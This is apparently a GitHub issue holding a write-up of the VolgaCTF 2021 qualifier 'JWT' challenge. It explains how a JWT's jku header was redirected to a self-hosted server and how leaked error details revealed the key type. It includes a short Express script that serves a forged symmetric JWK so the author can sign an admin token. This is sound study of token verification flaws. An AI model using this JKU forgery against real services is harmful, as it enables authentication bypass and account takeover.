VolgaCTF 2021 Qualifier - JWT #30

aszx87410 opened this issue Mar 28, 2021 · 0 comments
JWT

Description

[Screenshot 2021-03-28 23:38:56: challenge description]

Writeup

After registering and logging in we get a JWT, and we need to be admin to get the flag.

This is what the JWT looks like:

[Screenshot 2021-03-28 23:40:40: decoded JWT]

At first, I found that I could replace jku with my own server, so I implemented a simple server to return the key. Unfortunately, it kept returning an error saying that it could not find a suitable key. I was stuck here for a long time and had no idea how to proceed.

Then, I noticed a very important part of the error message: part of the JWK is included in the response. So I tried changing the JWT kid to another random string; here is the error message from the server:

JWT processing failed. Additional details: [[17] Unable to process JOSE object (cause: org.jose4j.lang.UnresolvableKeyException: Unable to find a suitable verification key for JWS w/ header {"kid":"HS2561","alg":"HS256"} from JWKs [org.jose4j.jwk.OctetSequenceJsonWebKey{kty=oct, kid=HS256, alg=HS256}] obtained from http://localhost:8080/secret): JsonWebSignature{"kid":"HS2561","alg":"HS256"}->eyJraWQiOiJIUzI1NjEiLCJhbGciOiJIUzI1NiJ9.eyJqa3UiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvc2VjcmV0IiwiZXhwIjoxNjE3NTMwOTkyLCJqdGkiOiJCREFjSTZ1V0p5X0tvdmhTWnN6WW5nIiwiaWF0IjoxNjE2OTI2MTkyLCJuYmYiOjE2MTY5MjYwNzIsInN1YiI6ImV3ZWlvZmpld29pZiJ9.G_4j1QH9RoiSkv59rmZz0gtNFKPath-Bi8J4_dQmevo]

Great! Now we know the kty is oct; no wonder kty=RSA kept throwing errors.

Now that we know the correct kty, we can create our own JWK server:

```js
const express = require('express')
const app = express()

// Serve a symmetric (kty=oct) JWK whose kid and alg match the token header,
// so the verifier resolves it as the verification key. "k" is the base64url
// encoded HMAC secret we will sign our own token with.
app.get('/', (req, res) => {
  res.json({
    "kty": "oct",
    "kid": "HS256",
    "alg": "HS256",
    "k": "AyM1SysPpbyDfgZld3umj1qzKObwVMkoqQ-EstJQLr_T-1qS0gZH75aKtMN3Yj0iPS4hcgUuTwjAzZr1Z9CAow"
  })
})

app.listen(3000)
```

We can sign a new JWT with sub=admin using this secret key and get the flag.

References:

  1. https://blog.pentesteracademy.com/hacking-jwt-tokens-jku-claim-misuse-2e732109ac1c
  2. https://tools.ietf.org/html/rfc7517#appendix-A.3